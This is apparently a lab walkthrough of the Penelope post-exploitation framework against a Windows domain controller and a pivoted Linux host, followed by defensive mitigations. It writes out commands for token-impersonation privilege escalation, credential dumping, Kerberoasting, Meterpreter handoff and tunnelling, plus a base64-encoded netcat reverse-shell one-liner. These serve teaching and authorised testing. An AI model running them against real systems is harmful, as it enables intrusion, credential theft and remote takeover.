Overview

This article presents an end-to-end engagement built entirely around Penelope, an automated shell handler and post-exploitation framework. We catch an initial reverse shell on a Windows Server 2019 Domain Controller, drive Penelope’s modules to escalate privileges, dump credentials, harvest Active Directory data, and Kerberoast a service account, then hand off to Meterpreter and clean up our artefacts. From there, we pivot through the domain controller into a hidden subnet with Ligolo-ng, compromise a Linux host, and run a full sweep of Linux enumeration tooling. Finally, we explore Penelope’s operational backbone—custom listeners, tailored payload generation, bind-shell connections, multi-session management, port forwarding, file transfer, and a built-in HTTP file server. Together, these stages show how a single console can manage the complete post-exploitation lifecycle across both Windows and Linux.

Table of Contents: 

• Introduction
• Lab Environment
• Installing Penelope
• Starting the Listener
• Generating the Reverse Shell Payload
• Receiving the Reverse Shell
• Detaching the Session
• Listing the Available Modules
• Exploring the Help Menu
• Privilege Escalation Enumeration (Windows)
• Staging the Potato Exploits
• Credential Dumping
• Active Directory Tooling
• Spawning a Meterpreter Session
• Cleaning Up Artefacts
• Pivoting with Ligolo-ng
• Establishing the Pivot Route
• Scanning and Accessing the Hidden Host
• Catching and upgrading the Linux Shell
• Linux Privilege-Escalation Enumeration
• Collecting Forensic Artefacts
• Managing Multiple Sessions
• Forwarding a Loopback-Only Service
• Transferring Files to and From the Target
• Adding a Custom Listener
• Generating Payloads for the Listener
• Executing the Payload on the Target
• Catching the New Reverse Shell
• Connecting to a Bind Shell
• Spawning a Reverse Shell over SSH
• Serving Files over HTTP
• Mitigation Strategies
• Conclusion

Introduction

Penelope is an automated, cross-platform shell handler designed to replace the bare “netcat” listener that most operators reach for by default. Beyond simply catching a reverse shell, it manages multiple concurrent sessions, logs every interaction to disk, upgrades raw shells to fully interactive PTYs, and exposes a rich library of post-exploitation modules. With a single command, an operator can stage privilege-escalation enumeration tools, credential-dumping utilities, Active Directory tradecraft, pivoting agents, and persistence mechanisms directly onto the target.

The framework also gives the operator precise control over how shells connect: it can add listeners on demand, generate matching payloads, connect to bind shells, forward ports through an existing session, and serve files over HTTP. Because Penelope automates the repetitive plumbing of an engagement—downloading the latest tooling, uploading it to the victim, executing it, and recording the output—it lets the operator concentrate on tradecraft rather than logistics. The walkthrough below follows that workflow from initial access through pivoting and operational control, entirely within a controlled lab and strictly for authorised testing and education.

Lab Environment

The engagement uses an isolated VMware lab containing a Kali attacker and several targets across the IGNITE (ignite.local) domain. Pivoting through the domain controller exposes an additional internal subnet that is not directly reachable from Kali.

Installing Penelope

We begin by installing Penelope directly from the Kali repositories. The package is lightweight—roughly 50 KB—and the APT resolver confirms a single new package will be installed from the kali-rolling main branch. Once installed, the “penelope” binary is available system-wide.

apt install penelope

Starting the Listener

Next, we launch Penelope and bind a listener to TCP port 5000. Penelope immediately reports that it is listening on 0.0.0.0:5000 and helpfully prints every interface address the operator might use as a callback—here including 192.168.1.17. The interactive prompt also surfaces shortcuts for the Main Menu, payload generation, screen clearing, and quitting.

penelope -p 5000

Generating the Reverse Shell Payload

With the listener live, we craft the payload that the target will execute. Using the Reverse Shell Generator, we set the attacker IP to 192.168.1.17 and the port to 5000, then select the Windows “PowerShell #2” template. The generator produces a self-contained PowerShell one-liner that opens a TCP client back to our listener and streams an interactive shell over the connection.

The following PowerShell payload is delivered to the target. (It is wrapped here for readability; in practice, it runs as a single line.)

powershell -nop -c "command"

Receiving the Reverse Shell

Once the payload runs on the victim, Penelope catches the connection instantly. It fingerprints the host and reports a new reverse shell from “DC” at 192.168.1.11, identifying it as a Microsoft Windows Server 2019 Standard Evaluation x64 machine. Penelope adds readline support, attaches us to Session 1, and writes a session log to disk for later review. A quick “whoami” confirms we are running as ignite\administrator—the built-in domain administrator on the DC.

whoami

Detaching the Session

Penelope lets us step back from an interactive shell without killing it. Pressing Ctrl-D detaches the current session and drops us back to the Penelope menu, where the prompt now shows the active Session [1]. The shell on the target remains live, ready for us to re-attach or to drive with modules from the menu.

[ Press Ctrl-D to detach the session ]

Listing the Available Modules

From the menu, the “modules” command reveals Penelope’s post-exploitation arsenal, neatly grouped by purpose: Privilege Escalation (winPEAS, LinPEAS, PowerUp, PrivescCheck, potato exploits, and more), Credential Dumping (Mimikatz, LaZagne, Snaffler, SharpWeb), Active Directory (PowerView, SharpHound, GhostPack), Forensics, Pivoting (Ligolo-ng, Chisel, ngrok), Persistence (PANIX), and miscellaneous helpers such as a Meterpreter launcher and a cleanup routine. Each module automates downloading the latest release and staging it on the target.

modules

Exploring the Help Menu

The “help” command documents Penelope’s full command set. Session operations include run, upload, download, open, spawn, upgrade, exec, script, and portfwd; session management covers sessions, use, interact, and kill; and shell management exposes listeners, payloads, and connect. This single reference makes the framework approachable even mid-engagement.

help

Privilege Escalation Enumeration (Windows)

We start post-exploitation by staging privilege-escalation tooling. The “run upload_privesc_scripts” module downloads the latest winPEASany.exe, winPEAS.bat, PowerUp.ps1, and PrivescCheck.ps1 and uploads each one to the target’s administrator profile, confirming an “Upload OK” for every file.

run upload_privesc_scripts

With the tools in place, we execute winPEAS to enumerate the host. winPEAS scans for misconfigurations, privileged objects, and sensitive data, colour-coding its findings—red for potential privilege-escalation vectors, green for hardened settings, and cyan or blue for active and disabled users—to highlight the fastest path to elevation.

exec C:\Users\Administrator\winPEASany.exe

Staging the Potato Exploits

Service accounts that hold the SeImpersonatePrivilege are prime targets for the “potato” family of exploits. The “run upload_potato” module uploads GodPotato-NET4.exe, SigmaPotato.exe, and PrintSpoofer64.exe to the target, each abusing token impersonation to elevate to NT AUTHORITY\SYSTEM.

run upload_potato

We re-attach to Session 1 and run GodPotato to execute a command as SYSTEM. By impersonating a SYSTEM token captured through the RPCSS DCOM trigger, GodPotato resets the administrator account password to a value of our choosing. The output confirms the impersonation succeeded as NT AUTHORITY\SYSTEM and that the command completed successfully.

sessions 1

./GodPotato-NET4.exe -cmd "net user administrator Ignite@987"

Credential Dumping

Next, we harvest credentials. The “run upload_credump_scripts” module stages Mimikatz, LaZagne, Snaffler, and SharpWeb on the target. Together these tools extract cached secrets, browser and application passwords, and credentials scattered across file shares.

run upload_credump_scripts

Executing LaZagne dumps secrets across every supported software module. Running as SYSTEM, it decrypts the system master keys and reveals the LSA secrets—including the machine account hash, the DefaultPassword used for autologon, the DPAPI_SYSTEM key, and the NL$KM cached-credential key—providing rich material for lateral movement.

exec C:\Users\Administrator\LaZagne.exe

Active Directory Tooling

To map and attack the domain, we stage Active Directory tradecraft. The “run upload_ad_scripts” module uploads PowerView.ps1 for domain reconnaissance, SharpHound for BloodHound collection, and the full GhostPack suite of compiled C# offensive tools.

run upload_ad_scripts

Listing the GhostPack directory reveals the complete toolset—Rubeus, Certify, Seatbelt, SharpRoast, and more, compiled for several .NET versions. We then run Rubeus to Kerberoast the domain, which identifies a single kerberoastable account, “raj,” bearing the service principal name hackingarticles/ignite.local, and writes its crackable ticket hash to hash.txt for offline cracking.

exec dir C:\Users\Administrator\ghostpack
exec C:\Users\Administrator\ghostpack\Rubeus.exe kerberoast /outfile:hash.txt

Spawning a Meterpreter Session

Penelope integrates cleanly with the Metasploit Framework. The “run meterpreter” module generates an x64 Windows Meterpreter reverse-TCP payload with msfvenom, uploads it to the target’s temp directory, and prints the exact msfconsole handler command—pre-configured with our LHOST of 192.168.1.17 and LPORT 5555—before executing the payload on the victim.

run meterpreter

Once we launch the handler in msfconsole and trigger the uploaded executable, Metasploit reports a Meterpreter session opened from 192.168.1.11. A “sysinfo” confirms full control of the domain controller: computer DC, Windows Server 2019 (Build 17763), x64 architecture, joined to the IGNITE domain.

msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 192.168.1.17; set LPORT 5555; run"

sysinfo

Cleaning Up Artifacts

Good operational security means removing the tools we staged. The “run cleanup” module deletes every file Penelope uploaded during the engagement—Mimikatz, LaZagne, Snaffler, SharpWeb, PowerView, SharpHound, GhostPack, and the Kerberoast output—restoring the target to its prior state and reducing forensic footprint.

run cleanup

Pivoting with Ligolo-ng

With the domain controller fully under control, we prepare to pivot deeper. On the attacker, we start the Ligolo-ng proxy with a self-signed certificate; it loads its configuration and listens on 0.0.0.0:11601 for incoming agents.

ligolo-proxy –selfcert

Back in Penelope, the “run ligolo” module downloads and uploads the matching Ligolo-ng Windows agent to the target. We then execute the agent, instructing it to connect back to our proxy at 192.168.1.17:11601 while ignoring certificate validation. With the tunnel established, the operator can route traffic through the domain controller and reach otherwise unreachable internal segments.

run ligolo
exec C:\Users\Administrator\agent.exe -connect 192.168.1.17:11601 -ignore-cert

Establishing the Pivot Route

With the agent reporting “Agent joined,” we select the domain controller session and inspect its interfaces. The “ifconfig” output reveals that the DC is dual homed: alongside its primary 192.168.1.11 address, Interface 1 carries a second address, 192.168.147.130/24, exposing an internal subnet that Kali cannot reach directly. We then run “autoroute,” select that 192.168.147.130/24 network, let Ligolo create a fresh virtual interface, and start the tunnel. From this point on, traffic to the 192.168.147.0/24 range routes transparently through the compromised DC.

session
ifconfig
autoroute

Scanning and Accessing the Hidden Host

With the route live, we scan the newly reachable host through the tunnel. An Nmap service scan of 192.168.147.131 uncovers a Linux server running FTP (vsftpd 3.0.5), SSH (OpenSSH 8.9p1), Apache 2.4.52, rpcbind, Samba, and NFS. Armed with valid credentials, we open an SSH session as the “pentest” user and land on an Ubuntu 22.04.5 LTS host named ignite—a machine that simply did not exist from Kali’s perspective minutes earlier.

nmap -sV 192.168.147.131
ssh [email protected]

Catching and upgrading the Linux Shell

Next, we route a reverse shell from the Linux host back into Penelope. The listener on port 5000 catches the connection, fingerprints it as ignite (192.168.1.9, Linux-x86_64) running as pentest, and—crucially—automatically upgrades the raw shell to a fully interactive PTY using python3. A quick “lsb_release -a” confirms Ubuntu 22.04.5 LTS (jammy). We then detach, leaving the session live for module-driven enumeration.Press f12 to Deattach Session

penelope -p 5000
lsb_release -a

Linux Privilege-Escalation Enumeration

We begin Linux enumeration with PEASS-ng. The “run peass_ng” module downloads the latest linpeas.sh, executes it on the target in the background, and streams the live output into a dedicated terminal. LinPEAS systematically hunts for privilege-escalation vectors and colour-codes its findings, flagging anything marked RED/YELLOW as a 95% likely escalation path.

run peass_ng

To corroborate those results, we run Linux Smart Enumeration. The “run lse” module fetches lse.sh and executes it, producing a tidy report of the user context, host details, and a tiered set of security checks that escalate in verbosity.

run lse

Finally, we focus specifically on kernel and package weaknesses. The “run linuxexploitsuggester” module downloads linux-exploit-suggester and matches the kernel against known CVEs, surfacing candidates such as CVE-2021-3156 (the Sudo “Baron Samedit” heap overflow) and CVE-2021-22555 (a Netfilter heap out-of-bounds write), complete with exposure ratings and exploit links.

run linuxexploitsuggester

Collecting Forensic Artefacts

Penelope also supports defensive and forensic workflows. The “run uac” module uploads the Unix-like Artefacts Collector to /dev/shm, extracts it, and launches a structured collection of nearly 200 artefact definitions—process listings, open files, and live-response data—writing the results to a timestamped archive on the target for later analysis.

run uac

Managing Multiple Sessions

With several footholds in play, Penelope’s session management comes into its own. The “history” command replays every Main Menu command issued during the engagement—an invaluable audit trail when documenting an assessment or retracing a complex attack path.

history

Sessions

The “sessions” command lists every active shell at a glance. Here, Penelope holds two: Session 1 on the Linux host (ignite, 192.168.1.9, a PTY shell as pentest) and Session 2 on the Windows DC (192.168.1.11, a raw shell as ignite\administrator).

sessions

Interact

To switch context, we attach directly to a specific shell. The “interact 2” command drops us into the Windows DC session, returning the familiar PowerShell prompt.

interact 2

Kill

Sessions can also be torn down cleanly. The “kill 2” command terminates the DC shell—Penelope reports that the session died—and a follow-up “session” confirms only the Linux host remains.

kill 2
sessions

Use Command

The “use 1” command selects the Linux session as the active target without immediately attaching to its shell, so that subsequent menu commands and modules apply to it.

use 1

Spawn

When a single shell is not enough, Penelope can spawn more. The “spawn 1234” command opens a new listener on 192.168.1.17:1234 and triggers an additional reverse shell from the same Linux host, which arrives as Session 3. Listing sessions now shows both shells—the original PTY on port 5000 and the new raw shell on port 1234—giving us redundancy if one connection drops.

spawn 1234
sessions

Local Port Forwarding

Many services bind only to localhost, hiding from the network. Running “exec netstat -antp” on the target reveals exactly such a service listening on 127.0.0.1:8080, reachable only from the host itself.

exec netstat -antp

Because that service is bound to loopback, browsing to the target’s port 8080 across the network fails—Firefox simply reports “Unable to connect.” The service is effectively invisible to a remote attacker.

http://192.168.1.11:8080

Penelope solves this with built-in port forwarding. The “portfwd” command tunnels our local 127.0.0.1:8080 to the target’s 127.0.0.1:8080 through the existing session, bridging the loopback gap without any extra tooling on the victim.

portfwd 127.0.0.1:8080 -> 127.0.0.1:8080

With the forward in place, we browse to http://localhost:8080 on the attacker and the hidden web application loads cleanly, greeting us with “Welcome to Hacking Articles.” A service that was unreachable moments ago is now fully accessible.

http://localhost:8080

Transferring Files to and From the Target

Penelope makes file transfer effortless. The “upload” command pushes a local file to the target; here we upload raj.txt and confirm its arrival with “exec ls -al,” which shows the file in place under /home/pentest with the expected ownership and timestamp.

upload raj.txt
exec ls -al /home/pentest/raj.txt

Pulling files back is just as simple. After listing the target’s home directory with “exec ls,” we run “download” on ignite.txt; Penelope retrieves it and stores it neatly inside the per-session downloads folder on the attacker.

exec ls /home/pentest/
download /home/pentest/ignite.txt

Finally, we verify the exfiltrated file on Kali. Reading the downloaded ignite.txt from the session’s downloads directory returns its contents—“Visit Hacking Articles”—confirming a clean round-trip transfer.

cat /root/.penelope/sessions/ignite~192.168.1.11-Linux-x86_64/downloads/home/pentest/ignite.txt

Adding a Custom Listener

Beyond catching shells, Penelope gives the operator precise control over how and where connections arrive. We start by creating a listener on a specific interface and port. The “listeners add” command binds a new TCP listener to 192.168.1.17 on port 8888, and Penelope immediately confirms it is listening. Running “listeners” then lists every active listener, showing the new entry as ID 3—ready to receive callbacks.

listeners add -i 192.168.1.17 -p 8888
listeners

Generating Payloads for the Listener

Penelope can craft matching payloads for any active listener. The “payloads eth0” command generates a set of one-liners bound to the eth0 listener at 192.168.1.17:8888, offering several flavours—Bash TCP, Netcat with a named pipe, PowerShell, and a Metasploit handler configuration. Each payload is pre-populated with the correct host and port, so there is nothing left to edit before use.

payloads eth0

Executing the Payload on the Target

Next, we run one of the generated payloads on the Linux target. The Netcat-with-named-pipe one-liner is base64-encoded; decoding and piping it to the shell creates a FIFO, wires the shell’s input and output through it, and connects back to our 8888 listener. The command returns silently, indicating the reverse shell has fired.

printf KHJtIC90bXAvXztta2ZpZm8gL3RtcC9fO2NhdCAvdG1w
L198c2ggMj4mMXxuYyAxOTIuMTY4LjEuMTcgODg4OCA+L3RtcC9f
KSA+L2Rldi9udWxsIDI+JjEgJg==|base64 -d|sh

Catching the New Reverse Shell

Back in Penelope, the payload pays off. The console announces a new reverse shell from ignite (192.168.1.11) running as pentest, assigned Session ID 3. A “sessions” listing confirms the shell arrived on the dedicated 192.168.1.17:8888 listener—clearly distinguished from the earlier session on port 5000—demonstrating how separate listeners keep concurrent operations organised.

Sessions

Connecting to a Bind Shell

Penelope is not limited to reverse shells. When a target already listens with a bind shell, the “connect” command reaches out to it directly. Here we connect to a bind shell on a Windows DC at 192.168.1.12 port 4321; Penelope establishes the connection, fingerprints the host as Windows Server 2019, adds readline support, and drops us straight into an interactive session as Session 4.

connect 192.168.1.12 4321

Spawning a Reverse Shell over SSH

Penelope can also launch a listener and trigger a shell in a single command. By appending an SSH directive to the launch line, we start a listener on port 5555 and have Penelope execute a reverse-shell command over SSH against 192.168.1.11 in one step. Penelope reports the SSH command executed, catches the resulting shell, and—as before—automatically upgrades it to a fully interactive PTY via python3. A quick “whoami” confirms we are the pentest user.

penelope -p 5555 ssh [email protected]
whoami

Serving Files over HTTP

Staging tools and exfiltrating loot often calls for a quick web server. Penelope bundles one: the “-s” flag serves a local directory over HTTP. Launching it on the “share” folder publishes /root/share on port 8000 and conveniently prints the full URL for every available interface, including 192.168.1.17, so the target can fetch files immediately.

penelope -s share

Browsing to the published URL confirms the server is live. Navigating to http://192.168.1.17:8000/share/ renders a directory listing of the shared folder, exposing data.txt and secret.txt for download—an instant, dependency-free way to move files between attacker and target.

http://192.168.1.17:8000/share/

Mitigation Strategies

Defenders can disrupt every stage of this engagement with a layered set of controls:

• Segment networks and avoid dual-homing sensitive servers such as domain controllers, so a single compromise cannot bridge isolated subnets or enable pivoting.
• Enforce strict egress filtering and application-aware firewalls so internal hosts cannot open outbound connections to attacker-controlled listeners on arbitrary ports, and monitor for unexpected tunnels or virtual interfaces created by tools like Ligolo-ng, Chisel, or ngrok.
• Constrain PowerShell with Constrained Language Mode, script-block and module logging, and AMSI, and alert on encoded or download-cradle one-liners.
• Remove SeImpersonatePrivilege from accounts that do not require it to neutralise the potato family of token-impersonation exploits.
• Protect credentials by enabling Credential Guard and LSA protection (RunAsPPL), disabling WDigest, and clearing autologon DefaultPassword values.
• Harden service accounts against Kerberoasting by using Group Managed Service Accounts with long, random passwords and enforcing AES encryption types.
• Apply timely kernel and package updates to close local privilege-escalation flaws such as CVE-2021-3156 and CVE-2021-22555, and restrict SUID binaries and unnecessary Sudo rules that LinPEAS and LSE routinely flag.
• Restrict and log SSH with key-based authentication, MFA, source-IP allow-listing, and command auditing to catch remotely injected reverse-shell commands.
• Detect bind shells and ad-hoc file servers by baselining the legitimate services each host should expose and alerting on unexpected listening ports or HTTP transfers.
• Watch for shell tradecraft—base64-decoded one-liners, named-pipe (mkfifo) reverse shells, and unexpected use of nc, bash, or powershell to open sockets—and monitor for bulk file reads or writes that signal staging or exfiltration.
• Deploy EDR and network detection to correlate listener creation, payload execution, credential access, and new sessions as a single intrusion rather than isolated events.

Conclusion

This engagement showed Penelope operating as a complete post-exploitation hub rather than a simple shell catcher. Starting from a single reverse shell on a Windows domain controller, we used its modules to escalate to SYSTEM, dump credentials, harvest Active Directory data, Kerberoast a service account, hand off to Meterpreter, and clean up afterwards. We then rode a Ligolo-ng pivot into a hidden subnet, compromised a Linux host, and ran a full enumeration sweep with PEASS-ng, LSE, Linux Exploit Suggester, and UAC. Finally, we exercised the framework’s operational backbone—custom listeners, tailored payloads, bind-shell connections, multi-session management, port forwarding, file transfer, and a built-in HTTP server. Across Windows and Linux alike, Penelope unified the entire workflow into one coherent, auditable console. For defenders, the same walkthrough is a clear map of the behaviours to monitor and the controls that break the chain. Used only where you have explicit authorisation, Penelope is a powerful force multiplier for the modern operator.